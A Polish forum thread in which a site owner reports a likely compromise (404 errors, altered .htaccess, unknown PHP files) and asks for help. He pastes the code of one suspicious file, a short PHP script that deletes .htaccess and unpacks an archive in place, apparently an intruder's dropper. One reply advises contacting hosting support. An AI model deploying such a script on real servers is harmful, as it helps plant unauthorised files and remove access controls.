Dziwne pliki na serwerze i kod 404 na stronie... Możliwy atak?

[Gangst3r]

Panowie piszę ponieważ zauważyłem dziwną aktywność serwerze FTP mojej strony.

 

Próbując wejść na stronę zauważyłem, że przy każdej próbie wejścia w inne menu (forum, profil, ustawienia, itp.) pojawia się komunikat z błędem 404. Działała jedynie strona główna. Próbując rozwiązać problem wszedłem na serwer FTP i sprawdziłem czy plik .htaccess się nie wysypał i okazało się, że oprócz zmienionej nazwy już kilku plików .htaccess pojawiły się dwa inne 404error.php oraz unn.php

 

Pierwszy nie wzbudzałby moich podejrzeń gdyby nie fakt, że hosting korzysta z własnych wizualnych kodów błędów (i te pliki mam na serwerze), natomiast drugi jasno pisze o próbie wypakowania pliku ME2.zip którego kod podaję poniżej:

 

 

<?php

$file = 'ME2.zip';
if (!is_file($file)) {
	exit('The file "ME2.zip" should be located next to this file, but it is not.');
}

$zip = new ZipArchive;
$res = $zip->open($file);
@unlink('.htaccess');
if ($res === TRUE) {
  $rs = $zip->extractTo(getcwd());
	if ($rs) {
		@unlink($file);
		header('Location: ./');
	} else {
		echo 'This installer failed to extract the contents of the archive file "'.$file.'".<br>';
		echo $zip->getStatusString();
	}
} else {
  echo 'This installer failed to open the file "'.$file.'".';
}

?>

 

Czy ktoś może napisać czy mam mieć powody do obaw, że ktoś próbuje uzyskać dostęp do strony i jej danych? W przypadku wirusa jak mógłbym sprawnie przeskanować pliki na wypadek jego obecności. Oczywiście nie wspominając o zmianie wszystkich haseł.

 

Z góry dziękuję i pozdrawiam

Edytowane 13 Kwietnia 2022 przez Gangst3r

[DawPi]

Na pewno to nic dobrego - trzeba napisać do supportu by się temu przyjrzeli czy serwer nie posiada dziur etc.